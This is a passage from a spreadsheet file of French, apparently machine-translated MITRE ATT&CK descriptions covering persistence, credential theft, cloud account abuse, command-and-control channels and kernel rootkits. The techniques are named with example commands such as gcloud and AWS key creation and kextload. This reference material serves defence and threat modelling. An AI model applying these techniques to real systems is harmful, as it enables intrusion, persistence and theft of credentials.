* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
Les valeurs des clés répertoriées sont des commandes qui sont exécutées lorsque le gestionnaire ouvre l’extension de fichier. Les adversaires peuvent modifier ces valeurs pour exécuter en permanence des commandes arbitraires. (Citation : TrendMicro TROJ-FAKEAV OCTOBRE 2012)
https://attack.mitre.org/techniques/T1546/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans les processus par le biais du détournement VDSO afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. Le détournement d’objets virtuels dynamiques partagés (vdso) est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
Le détournement VDSO consiste à rediriger les appels vers des bibliothèques partagées liées dynamiquement. Les protections de mémoire peuvent empêcher l’écriture de code exécutable dans un processus via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). Toutefois, un adversaire peut détourner les stubs de code de l’interface syscall mappés dans un processus à partir de l’objet partagé vdso pour exécuter des appels système afin d’ouvrir et de mapper un objet partagé malveillant. Ce code peut ensuite être appelé en redirigeant le flux d’exécution du processus via des références d’adresses de mémoire corrigées stockées dans la table de décalage globale d’un processus (qui stockent les adresses absolues des fonctions de bibliothèque mappées). (Citation : Injection ELF mai 2009)(Citation : Backtrace VDSO)(Référence : VDSO août 2005)(Citation : Syscall 2014)
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution via le détournement VDSO peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/014</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide de protocoles de couche application associés au transfert de fichiers pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Les protocoles tels que SMB (Citation : US-CERT TA18-074A), FTP (Citation : ESET Machete juillet 2019), FTPS et TFTP qui transfèrent des fichiers peuvent être très courants dans les environnements.  Les paquets produits à partir de ces protocoles peuvent comporter de nombreux champs et en-têtes dans lesquels les données peuvent être dissimulées. Les données peuvent également être dissimulées dans les fichiers transférés. Un adversaire peut abuser de ces protocoles pour communiquer avec les systèmes sous son contrôle au sein d’un réseau victime tout en imitant le trafic normal et attendu.
https://attack.mitre.org/techniques/T1071/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les vulnérabilités logicielles pour tenter de collecter des informations d’identification. L’exploitation d’une vulnérabilité logicielle se produit lorsqu’un adversaire profite d’une erreur de programmation dans un programme, un service ou dans le logiciel ou le noyau du système d’exploitation lui-même pour exécuter du code contrôlé par l’adversaire. 
Les mécanismes d’accréditation et d’authentification peuvent être exploités par des adversaires comme moyen d’accéder à des informations d’identification utiles ou de contourner le processus pour obtenir un accès authentifié aux systèmes. Par exemple, « MS14-068 », qui cible Kerberos et peut être utilisé pour falsifier des tickets Kerberos à l’aide des autorisations des utilisateurs du domaine. (Référence : Technet MS14-068)(Citation : ADSecurity détecte les tickets falsifiés) Un autre exemple de cela est les attaques par rejeu, dans lesquelles l’adversaire intercepte des paquets de données envoyés entre les parties, puis rejoue ensuite ces paquets. Si les services ne valident pas correctement les demandes d’authentification, ces paquets rejoués peuvent permettre à un adversaire d’usurper l’identité de l’une des parties et d’obtenir un accès ou des privilèges non autorisés. (Citation : Bugcrowd Replay Attack)(citation : Comparitech Replay Attack)(Citation : Microsoft Midnight Blizzard Replay Attack)
Une telle exploitation a également été démontrée dans les environnements cloud. Par exemple, des adversaires ont exploité des vulnérabilités dans l’infrastructure de cloud public qui ont permis la création et le renouvellement involontaires de jetons d’authentification. (Citation : Techniques Storm-0558 pour l’accès non autorisé aux e-mails)
L’exploitation pour l’accès aux informations d’identification peut également entraîner une élévation de privilèges en fonction du processus ciblé ou des informations d’identification obtenues.
https://attack.mitre.org/techniques/T1212</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir de la persistance et des privilèges élevés en exécutant du contenu malveillant déclenché par le démon du moniteur d’événements (emond). Emond est un [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) qui accepte les événements de divers services, les exécute via un simple moteur de règles et prend des mesures. Le binaire emond de &lt;code&gt;/sbin/emond&lt;/code&gt; chargera toutes les règles du répertoire &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; et agira une fois qu’un événement explicitement défini aura lieu.
Les fichiers de règles sont au format plist et définissent le nom, le type d’événement et l’action à entreprendre. Parmi les exemples de types d’événements, citons le démarrage du système et l’authentification de l’utilisateur. Des exemples d’actions consistent à exécuter une commande système ou à envoyer un e-mail. Le service emond ne se lancera pas s’il n’y a pas de fichier présent dans le chemin d’accès aux Répertoires de file d’attente &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, spécifié dans le fichier de configuration [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;. (Citation : xorrior emond Jan 2018)(Citation : magnusviri emond avril 2016)(Citation : sentinelone macos persist juin 2019)
Les adversaires peuvent abuser de ce service en écrivant une règle pour exécuter des commandes lorsqu’un événement défini se produit, tel que le démarrage du système ou l’authentification de l’utilisateur. (Citation : xorrior emond Jan 2018)(Citation : magnusviri emond avril 2016)(Citation : sentinelone macos persist juin 2019) Les adversaires peuvent également être en mesure d’élever les privilèges de l’administrateur à la racine, car le service emond est exécuté avec les privilèges root par le service [Launch Daemon](https://attack.mitre.org/techniques/T1543/004).
https://attack.mitre.org/techniques/T1546/014</t>
  </si>
  <si>
    <t>Des adversaires peuvent voler des jetons d'accès aux applications afin d'acquérir des informations d'identification pour accéder à des systèmes et des ressources distants.
Les jetons d'accès aux applications sont utilisés pour effectuer des demandes d'API autorisées au nom d'un utilisateur ou d'un service et sont couramment utilisés comme moyen d'accès aux ressources dans les applications basées sur le cloud et les conteneurs, ainsi que dans les logiciels en tant que service (SaaS).(Citation : Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Les adversaires qui volent des jetons d'API de compte dans les environnements cloud et conteneurisés peuvent être en mesure d'accéder aux données et d'effectuer des actions avec les autorisations de ces comptes, ce qui peut conduire à une escalade des privilèges et à une compromission plus poussée de l'environnement.
Par exemple, dans les environnements Kubernetes, les processus s'exécutant dans un conteneur peuvent communiquer avec le serveur API Kubernetes à l'aide de jetons de compte de service. Si un conteneur est compromis, un adversaire peut être en mesure de voler le jeton du conteneur et d'accéder ainsi aux commandes API de Kubernetes.(Citation : Comptes de service Kubernetes) De même, les instances au sein des pipelines de développement continu/intégration continue (CI/CD) utiliseront souvent des jetons API pour s'authentifier auprès d'autres services à des fins de test et de déploiement. (Citation : Cider Security Top 10 CICD Security Risks) Si ces pipelines sont compromis, des adversaires peuvent être en mesure de voler ces jetons et de tirer parti de leurs privilèges.
Le vol de jetons peut également se produire par le biais de l'ingénierie sociale, auquel cas une action de l'utilisateur peut être nécessaire pour accorder l'accès. OAuth est un cadre couramment mis en œuvre qui délivre des jetons aux utilisateurs pour l'accès aux systèmes. Une application souhaitant accéder à des services en nuage ou à des API protégées peut obtenir l'accès à l'aide d'OAuth 2.0 par le biais d'une variété de protocoles d'autorisation. Un exemple de séquence couramment utilisée est le flux d'octroi de code d'autorisation de Microsoft.(Citation : Microsoft Identity Platform Protocols May 2019)(Citation : Microsoft - OAuth Code Authorization flow - June 2019) Un jeton d'accès OAuth permet à une application tierce d'interagir avec des ressources contenant des données d'utilisateur de la manière demandée par l'application sans obtenir les informations d'identification de l'utilisateur.
Les adversaires peuvent tirer parti de l'autorisation OAuth en construisant une application malveillante conçue pour se voir accorder l'accès aux ressources avec le jeton OAuth de l'utilisateur cible.(Citation : Amnesty OAuth Phishing Attacks, August 2019)(Citation : Trend Micro Pawn Storm OAuth 2017) L'adversaire devra terminer l'enregistrement de son application auprès du serveur d'autorisation, par exemple Microsoft Identity Platform à l'aide d'Azure Portal, de l'IDE Visual Studio, de l'interface en ligne de commande, de PowerShell ou d'appels d'API REST. (Citation : Microsoft - Azure AD App Registration - May 2019) Ensuite, ils peuvent envoyer un [Spearphishing Link] (https://attack.mitre.org/techniques/T1566/002) à l'utilisateur cible pour l'inciter à accorder l'accès à l'application. Une fois le jeton d'accès OAuth accordé, l'application peut obtenir un accès potentiellement à long terme aux fonctionnalités du compte utilisateur par le biais du [jeton d'accès à l'application](https://attack.mitre.org/techniques/T1550/001).(Citation : Microsoft - Azure AD Identity Tokens - Aug 2019)
Les jetons d'accès aux applications peuvent fonctionner avec une durée de vie limitée, ce qui limite la durée pendant laquelle un adversaire peut utiliser le jeton volé. Cependant, dans certains cas, les adversaires peuvent également voler des jetons de rafraîchissement d'application(Citation : Auth0 Understanding Refresh Tokens), ce qui leur permet d'obtenir de nouveaux jetons d'accès sans demander l'avis de l'utilisateur.
https://attack.mitre.org/techniques/T1528"</t>
  </si>
  <si>
    <t>Les adversaires peuvent ajouter des informations d'identification contrôlées par l'adversaire à un compte cloud pour maintenir un accès permanent aux comptes et instances de la victime dans l'environnement.
Par exemple, les adversaires peuvent ajouter des informations d'identification pour les principaux services et les applications en plus des informations d'identification légitimes existantes dans Azure / Entra ID.(Citation : Microsoft SolarWinds Customer Guidance)(Citation : Blue Cloud of Death)(Citation : Blue Cloud of Death Video) Ces informations d'identification comprennent à la fois des clés x509 et des mots de passe. (Citation : Microsoft SolarWinds Customer Guidance) Avec des autorisations suffisantes, il existe plusieurs façons d'ajouter des informations d'identification, notamment via le portail Azure, l'interface de ligne de commande Azure et les modules Azure ou Azure PowerShell (Citation : Demystifying Azure AD Service Principals).
Dans les environnements d'infrastructure en tant que service (IaaS), après avoir obtenu un accès via [Cloud Accounts] (https://attack.mitre.org/techniques/T1078/004), les adversaires peuvent générer ou importer leurs propres clés SSH à l'aide de l'API CreateKeyPai ou &lt;code&gt;ImportKeyPair&lt;/code&gt; dans AWS ou de la commande gcloud compute os-login ssh-keys add dans GCP. (Citation : GCP SSH Key Add) Cela permet un accès permanent aux instances dans l'environnement cloud sans utilisation ultérieure des comptes cloud compromis.(Citation : Expel IO Evil in AWS)(Citation : Expel Behind the Scenes).
Les adversaires peuvent également utiliser l'API CreateAccessKey dans AWS ou la commande gcloud iam service-accounts keys create dans GCP pour ajouter des clés d'accès à un compte. Ils peuvent également utiliser l'API CreateLoginProfile dans AWS pour ajouter un mot de passe qui peut être utilisé pour se connecter à la console de gestion AWS pour [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation : Permiso Scattered Spider 2023)(Citation : Lacework AI Resource Hijacking 2024) Si le compte cible a des autorisations différentes de celles du compte demandeur, l'adversaire peut également être en mesure d'escalader ses privilèges dans l'environnement (c.-à-d. [Cloud Accounts](https://attack.mitre.org/techniques/T1538)). e. (Citation : Rhino Security Labs AWS Privilege Escalation) (Citation : Sysdig ScarletEel 2.0) Par exemple, dans les environnements Entra ID, un adversaire ayant le rôle d'administrateur d'application peut ajouter un nouvel ensemble d'informations d'identification au principal de service de son application. Ce faisant, l'adversaire serait en mesure d'accéder aux rôles et autorisations du principal de service, qui peuvent être différents de ceux de l'administrateur de l'application (Citation : SpecterOps Azure Privilege Escalation).
Dans les environnements AWS, les adversaires disposant des autorisations appropriées peuvent également utiliser l'appel API `sts:GetFederationToken` pour créer un ensemble temporaire d'informations d'identification pour [Forge Web Credentials] (https://attack.mitre.org/techniques/T1606) liées aux autorisations du compte d'utilisateur d'origine. Ces identifiants temporaires peuvent rester valides pendant toute leur durée de vie, même si les identifiants API du compte d'origine sont désactivés.
(Citation : Crowdstrike AWS User Federation Persistence)
Dans les environnements Entra ID avec la fonction de mot de passe d'application activée, les adversaires peuvent être en mesure d'ajouter un mot de passe d'application à un compte d'utilisateur. (Citation : Mandiant APT42 Operations 2024) Comme les mots de passe d'application sont destinés à être utilisés avec des appareils anciens qui ne prennent pas en charge l'authentification multifactorielle (MFA), l'ajout d'un mot de passe d'application peut permettre à un adversaire de contourner les exigences de MFA. En outre, les mots de passe d'application peuvent rester valides même si le mot de passe principal de l'utilisateur est réinitialisé.(Citation : Microsoft Entra ID App Passwords)
https://attack.mitre.org/techniques/T1098/001"</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un service Web externe légitime existant comme moyen d’envoyer des commandes à un système compromis sans recevoir de retour sur le canal du service Web. Les systèmes compromis peuvent exploiter des sites Web et des médias sociaux populaires pour héberger des instructions de commande et de contrôle (C2). Ces systèmes infectés peuvent choisir de renvoyer la sortie de ces commandes sur un autre canal C2, y compris vers un autre service Web distinct. Alternativement, les systèmes compromis peuvent ne renvoyer aucune sortie dans les cas où les adversaires veulent envoyer des instructions aux systèmes et ne veulent pas de réponse.
Les sites Web populaires et les médias sociaux agissant comme un mécanisme pour C2 peuvent offrir une couverture importante en raison de la probabilité que les hôtes d’un réseau communiquent déjà avec eux avant une compromission. L’utilisation de services courants, tels que ceux proposés par Google ou Twitter, permet aux adversaires de se cacher plus facilement dans le bruit attendu. Les fournisseurs de services Web utilisent généralement le cryptage SSL/TLS, ce qui offre aux adversaires un niveau de protection supplémentaire.
https://attack.mitre.org/techniques/T1102/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les réseaux de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les réseaux peuvent inclure une variété de détails, y compris des données administratives (par exemple, des plages d’adresses IP, des noms de domaine, etc.) ainsi que des détails concernant leur topologie et leur fonctionnement.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un [hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les informations sur les réseaux peuvent également être exposées à des adversaires par le biais d’un ensemble de données en ligne ou d’autres ensembles de données accessibles (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)). (Citation : WHOIS)(Citation : benne à ordures DNS)(Citation : Circl DNS passif) La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Fiable Relation](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1590</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les services à distance pour obtenir un accès non autorisé aux systèmes internes une fois à l’intérieur d’un réseau. L’exploitation d’une vulnérabilité logicielle se produit lorsqu’un adversaire profite d’une erreur de programmation dans un programme, un service ou dans le logiciel ou le noyau du système d’exploitation lui-même pour exécuter du code contrôlé par l’adversaire. L’un des objectifs courants de l’exploitation post-compromission des services distants est le mouvement latéral pour permettre l’accès à un système distant.
Un adversaire peut avoir besoin de déterminer si le système distant est dans un état vulnérable, ce qui peut être fait par le biais de [Network Service Discovery](https://attack.mitre.org/techniques/T1046) ou d’autres méthodes de découverte à la recherche de logiciels vulnérables courants susceptibles d’être déployés dans le réseau, de l’absence de certains correctifs pouvant indiquer des vulnérabilités ou de logiciels de sécurité pouvant être utilisés pour détecter ou contenir une exploitation à distance. Les serveurs sont probablement une cible de grande valeur pour l’exploitation des mouvements latéraux, mais les systèmes de points de terminaison peuvent également être à risque s’ils offrent un avantage ou un accès à des ressources supplémentaires.
Il existe plusieurs vulnérabilités bien connues qui existent dans les services courants tels que SMB (Citation : CIS Multiple SMB Vulnerabilities) et RDP (Citation : NVD CVE-2017-0176) ainsi que dans les applications qui peuvent être utilisées au sein de réseaux internes tels que MySQL (Citation : NVD CVE-2016-6662) et les services de serveur Web. (Référence : NVD CVE-2014-7169)
En fonction du niveau d’autorisation du service distant vulnérable, un adversaire peut réaliser [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068) à la suite de l’exploitation des mouvements latéraux également.
https://attack.mitre.org/techniques/T1210</t>
  </si>
  <si>
    <t>Une fois qu’ils ont déjà accès à des comptes ou à des systèmes au sein de l’environnement, les adversaires peuvent utiliser le harponnage interne pour accéder à des informations supplémentaires ou compromettre d’autres utilisateurs au sein de la même organisation. Le spearphishing interne est une campagne en plusieurs étapes dans laquelle un compte légitime est initialement compromis, soit en contrôlant l’appareil de l’utilisateur, soit en compromettant les informations d’identification du compte de l’utilisateur. Les adversaires peuvent alors tenter de tirer parti du compte interne de confiance pour augmenter la probabilité d’inciter davantage de victimes à tomber dans le piège des tentatives d’hameçonnage, en incorporant souvent l'[Usurpation d’identité](https://attack.mitre.org/techniques/T1656). (Citation : Trend Micro - Int SP)
Par exemple, les adversaires peuvent utiliser [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) ou [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) dans le cadre d’un spearphishing interne pour fournir une charge utile ou rediriger vers un site externe pour capturer des informations d’identification via [Input Capture](https://attack.mitre.org/techniques/T1056) sur des sites qui imitent les interfaces de connexion.
Les adversaires peuvent également exploiter des applications de chat internes, telles que Microsoft Teams, pour diffuser du contenu malveillant ou inciter les utilisateurs à capturer des informations sensibles et/ou des informations d’identification. (Citation : Int SP - applications de chat)
https://attack.mitre.org/techniques/T1534</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les fichiers binaires utilisés par les services. Les adversaires peuvent utiliser des failles dans les autorisations des services Windows pour remplacer le fichier binaire exécuté au démarrage du service. Ces processus de service peuvent exécuter automatiquement des fichiers binaires spécifiques dans le cadre de leurs fonctionnalités ou pour effectuer d’autres actions. Si les permissions sur le répertoire du système de fichiers contenant un binaire cible, ou les permissions sur le binaire lui-même ne sont pas correctement définies, alors le binaire cible peut être écrasé par un autre binaire à l’aide des permissions de niveau utilisateur et exécuté par le processus d’origine. Si le processus et le thread d’origine s’exécutent sous un niveau d’autorisation supérieur, le fichier binaire remplacé s’exécutera également sous des autorisations de niveau supérieur, qui peuvent inclure SYSTEM.
Les adversaires peuvent utiliser cette technique pour remplacer des fichiers binaires légitimes par des fichiers malveillants afin d’exécuter du code à un niveau d’autorisation plus élevé. Si le processus d’exécution est configuré pour s’exécuter à un moment précis ou lors d’un certain événement (par exemple, le démarrage du système), cette technique peut également être utilisée pour la persistance.
https://attack.mitre.org/techniques/T1574/010</t>
  </si>
  <si>
    <t>Les adversaires peuvent pénétrer dans les organisations qui ont accès aux victimes visées ou en tirer parti de toute autre manière. L’accès par le biais d’une relation avec un tiers de confiance abuse d’une connexion existante qui n’est peut-être pas protégée ou fait l’objet d’un examen moins minutieux que les mécanismes standard d’accès à un réseau.
Les organisations accordent souvent un accès élevé à des fournisseurs externes tiers ou secondaires afin de leur permettre de gérer des systèmes internes ainsi que des environnements basés sur le cloud. Parmi ces relations, mentionnons les entrepreneurs de services informatiques, les fournisseurs de services de sécurité gérés, les entrepreneurs en infrastructure (p. ex., CVC, ascenseurs, sécurité physique). L’accès du fournisseur tiers peut être destiné à être limité à l’infrastructure en cours de maintenance, mais peut exister sur le même réseau que le reste de l’entreprise. En tant que tels, les [Comptes valides](https://attack.mitre.org/techniques/T1078) utilisés par l’autre partie pour accéder aux systèmes de réseau internes peuvent être compromis et utilisés. (Citation : Fournisseurs de services informatiques de la CISA)
Dans les environnements Office 365, les organisations peuvent accorder aux partenaires ou aux revendeurs Microsoft des autorisations d’administrateur délégué. En compromettant un compte partenaire ou revendeur, un adversaire peut être en mesure d’exploiter les relations d’administrateur délégué existantes ou d’envoyer de nouvelles offres d’administrateur délégué aux clients afin d’obtenir un contrôle administratif sur le locataire victime. (Référence : Administration déléguée d’Office 365)
https://attack.mitre.org/techniques/T1199</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer un compte cloud pour conserver l’accès aux systèmes des victimes. Avec un niveau d’accès suffisant, ces comptes peuvent être utilisés pour établir un accès secondaire accrédité qui ne nécessite pas le déploiement d’outils d’accès à distance persistants sur le système. (Citation : Rôles d’administrateur Microsoft O365)(Citation : Microsoft Support O365 Ajouter un autre administrateur, octobre 2019)(citation : AWS Create IAM User)(Citation : GCP Create Cloud Identity Users)(Citation : Utilisateurs de Microsoft Azure AD)
Outre les comptes d’utilisateur, les comptes cloud peuvent être associés à des services. Les fournisseurs de cloud gèrent la notion de comptes de service de différentes manières. Dans Azure, les comptes de service incluent des principaux de service et des identités managées, qui peuvent être liés à diverses ressources telles que des applications OAuth, des fonctions serverless et des machines virtuelles afin d’accorder à ces ressources des autorisations leur permettant d’effectuer diverses activités dans l’environnement. (Citation : Principaux du service Microsoft Entra ID) Dans GCP, les comptes de service peuvent également être liés à des ressources spécifiques, ainsi qu’être empruntés par d’autres comptes pour [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005). (Citation : Comptes de service GCP) Bien qu’AWS n’ait pas de concept spécifique de comptes de service, les ressources peuvent être directement autorisées à assumer des rôles. (Citation : Profils d’instance AWS)(Citation : Rôle d’exécution AWS Lambda)
Les adversaires peuvent créer des comptes qui n’ont accès qu’à des services cloud spécifiques, ce qui peut réduire les risques de détection.
Une fois qu’un adversaire a créé un compte cloud, il peut manipuler ce compte pour garantir la persistance et autoriser l’accès à des ressources supplémentaires, par exemple, en ajoutant des [Informations d’identification cloud supplémentaires](https://attack.mitre.org/techniques/T1098/001) ou en attribuant des [Rôles cloud supplémentaires](https://attack.mitre.org/techniques/T1098/003).
https://attack.mitre.org/techniques/T1136/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de trouver des groupes de systèmes locaux et des paramètres d’autorisation. La connaissance des groupes d’autorisations système locaux peut aider les adversaires à déterminer quels groupes existent et quels utilisateurs appartiennent à un groupe particulier. Les adversaires peuvent utiliser ces informations pour déterminer quels utilisateurs disposent d’autorisations élevées, tels que les utilisateurs trouvés dans le groupe d’administrateurs locaux.
Des commandes telles que &lt;code&gt;net localgroup&lt;/code&gt; de l’utilitaire [Net](https://attack.mitre.org/software/S0039), &lt;code&gt;dscl . -list /Groups&lt;/code&gt; sous macOS et &lt;code&gt;groups&lt;/code&gt; sous Linux peuvent lister les groupes locaux.
https://attack.mitre.org/techniques/T1069/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des sites Web et/ou des domaines librement disponibles pour trouver des informations sur les victimes qui peuvent être utilisées lors du ciblage. Des informations sur les victimes peuvent être disponibles sur divers sites en ligne, tels que les médias sociaux, les nouveaux sites ou ceux qui hébergent des informations sur des opérations commerciales telles que l’embauche ou les contrats demandés/récompensés. (Citation : Médias sociaux Cyware)(Citation : SecurityTrails Google Hacking)(Citation : ExploitDB GoogleHacking)
Les adversaires peuvent effectuer des recherches sur différents sites en ligne en fonction des informations qu’ils cherchent à recueillir. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Phishing for Information](https://attack.mitre.org/techniques/T1598) ou [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), d’établissement de ressources opérationnelles (ex : [Établissement de comptes](https://attack.mitre.org/techniques/T1585) ou [Compromis](https://attack.mitre.org/techniques/T1586)), et/ou d’accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133) ou [Phishing](https://attack.mitre.org/techniques/T1566)).
https://attack.mitre.org/techniques/T1593</t>
  </si>
  <si>
    <t>Les adversaires peuvent manipuler les comptes pour maintenir et/ou améliorer l’accès aux systèmes des victimes. La manipulation de compte peut consister en toute action qui préserve ou modifie l’accès de l’adversaire à un compte compromis, telle que la modification des informations d’identification ou des groupes d’autorisations. (Citation : FireEye SMOKEDHAM, juin 2021) Ces actions peuvent également inclure une activité de compte conçue pour contourner les stratégies de sécurité, telles que l’exécution de mises à jour itératives des mots de passe pour contourner les politiques de durée de mot de passe et préserver la durée de vie des informations d’identification compromises. 
Pour créer ou manipuler des comptes, l’adversaire doit déjà disposer d’autorisations suffisantes sur les systèmes ou le domaine. Toutefois, la manipulation de compte peut également entraîner une élévation de privilèges lorsque des modifications accordent l’accès à des rôles supplémentaires, à des autorisations ou à des [comptes valides](https://attack.mitre.org/techniques/T1078) à privilèges supérieurs.
https://attack.mitre.org/techniques/T1098</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler des données en les exfiltrant via un protocole différent de celui du canal de commande et de contrôle existant. Les données peuvent également être envoyées à un autre emplacement réseau à partir du serveur de commande et de contrôle principal.  
Les autres protocoles incluent FTP, SMTP, HTTP/S, DNS, SMB ou tout autre protocole réseau n’étant pas utilisé comme canal de commande et de contrôle principal. Les adversaires peuvent également choisir de chiffrer et/ou d’obscurcir ces canaux alternatifs. 
[Exfiltration par le biais d’un protocole alternatif](https://attack.mitre.org/techniques/T1048) peut être effectué à l’aide de divers utilitaires courants du système d’exploitation tels que [Net](https://attack.mitre.org/software/S0039)/SMB ou FTP. (Citation : Palo Alto OilRig octobre 2016) Sur macOS et Linux, &lt;code&gt;curl&lt;/code&gt; peut être utilisé pour invoquer des protocoles tels que HTTP/S ou FTP/S afin d’exfiltrer des données d’un système. (Citation : 20 outils et techniques courants macOS)
De nombreuses plateformes IaaS et SaaS (telles que Microsoft Exchange, Microsoft SharePoint, GitHub et AWS S3) prennent en charge le téléchargement direct de fichiers, d’e-mails, de code source et d’autres informations sensibles via la console Web ou [Cloud API](https://attack.mitre.org/techniques/T1059/009).
https://attack.mitre.org/techniques/T1048</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le noyau pour exécuter automatiquement des programmes au démarrage du système. Les modules de noyau chargeables (LKM) sont des morceaux de code qui peuvent être chargés et déchargés dans le noyau à la demande. Ils étendent les fonctionnalités du noyau sans qu’il soit nécessaire de redémarrer le système. Par exemple, un type de module est le pilote de périphérique, qui permet au noyau d’accéder au matériel connecté au système. (Citation : Programmation du noyau Linux) 
Lorsqu’ils sont utilisés à des fins malveillantes, les LKM peuvent être un type de [Rootkit](https://attack.mitre.org/techniques/T1014) en mode noyau qui s’exécute avec les privilèges de système d’exploitation les plus élevés (anneau 0). (Citation : Guide de programmation du module du noyau Linux) Les fonctionnalités courantes des rootkits basés sur LKM incluent : la dissimulation, le masquage sélectif des fichiers, des processus et de l’activité réseau, ainsi que la falsification des journaux, la fourniture de portes dérobées authentifiées et l’activation de l’accès root aux utilisateurs non privilégiés. (Citation : Présentation du rootkit iDefense)
Les extensions de noyau, également appelées kext, sont utilisées dans macOS pour charger des fonctionnalités sur un système similaire aux LKM pour Linux. Étant donné que le noyau est responsable de l’application de la sécurité et que les extensions du noyau s’exécutent en tant que partie intégrante du noyau, les extensions de noyau ne sont pas régies par les stratégies de sécurité de macOS. Les kexts sont chargés et déchargés à l’aide des commandes &lt;code&gt;kextload&lt;/code&gt; et &lt;code&gt;kextunload&lt;/code&gt;. Les Kexts doivent être signés avec un ID de développeur qui bénéficie de privilèges accordés par Apple lui permettant de signer des extensions du noyau. Les développeurs qui ne disposent pas de ces privilèges peuvent toujours signer des extensions de code, mais elles ne se chargeront pas à moins que SIP ne soit désactivé. Si SIP est activé, la signature kext est vérifiée avant d’être ajoutée à l’AuxKC. (Citation : Extensions système et noyau dans macOS)
Depuis macOS Catalina 10.15, les extensions du noyau ont été dépréciées au profit des extensions système. Cependant, les extensions de noyau sont toujours autorisées en tant qu'« extensions système héritées » car il n’existe pas d’extension système pour les interfaces de programmation du noyau. (Citation : Dépréciation de l’extension du noyau Apple)
Les adversaires peuvent utiliser des LKM et des kexts pour effectuer une [Persistance](https://attack.mitre.org/tactics/TA0003) et/ou une [Élévation de privilèges](https://attack.mitre.org/tactics/TA0004) sur un système. Des exemples ont été trouvés dans la nature, et il existe également des projets open source pertinents. (Citation : Volatilité Phalanx2)(Citation : CrowdStrike Linux Rootkit)(Citation : GitHub Reptile)(Citation : GitHub Diamorphine)(Référence : RSAC 2015 San Francisco Patrick Wardle)(citation : Synack Secure Kernel Extension Broken)(Citation : Securelist Ventir)(Citation : Trend Micro Skidmap)
https://attack.mitre.org/techniques/T1547/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent imiter les composants habituels de l’interface graphique du système d’exploitation pour demander aux utilisateurs des informations d’identification avec une invite apparemment légitime. Lorsque des programmes sont exécutés qui nécessitent des privilèges supplémentaires par rapport au contexte utilisateur actuel, il est courant que le système d’exploitation demande à l’utilisateur les informations d’identification appropriées pour autoriser les privilèges élevés pour la tâche (ex : [Contourner le contrôle de compte d’utilisateur](https://attack.mitre.org/techniques/T1548/002)).
Les adversaires peuvent imiter cette fonctionnalité pour demander aux utilisateurs des informations d’identification avec une invite apparemment légitime pour un certain nombre de raisons qui imitent l’utilisation normale, telles qu’un faux programme d’installation nécessitant un accès supplémentaire ou une fausse suite de suppression de logiciels malveillants. (Citation : Le logiciel malveillant OSX exploite MacKeeper) Ce type d’invite peut être utilisé pour collecter des informations d’identification via différentes langues telles que [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation : LogRhythm Do You Trust Oct 2014)(Citation : OSX Keydnap malware)(Citation : Spoofing credential dialogs) et [PowerShell](https://attack.mitre.org/techniques/T1059/001). (Citation : LogRhythm Do You Trust Oct 2014)(Citation : Enigma Phishing for Credentials janvier 2015)(Citation : Usurpation des boîtes de dialogue d’identification) Sur les systèmes Linux, les adversaires peuvent ouvrir des boîtes de dialogue demandant aux utilisateurs des informations d’identification à partir de scripts shell malveillants ou de la ligne de commande (c’est-à-dire [Unix Shell](https://attack.mitre.org/techniques/T1059/004)). (Citation : 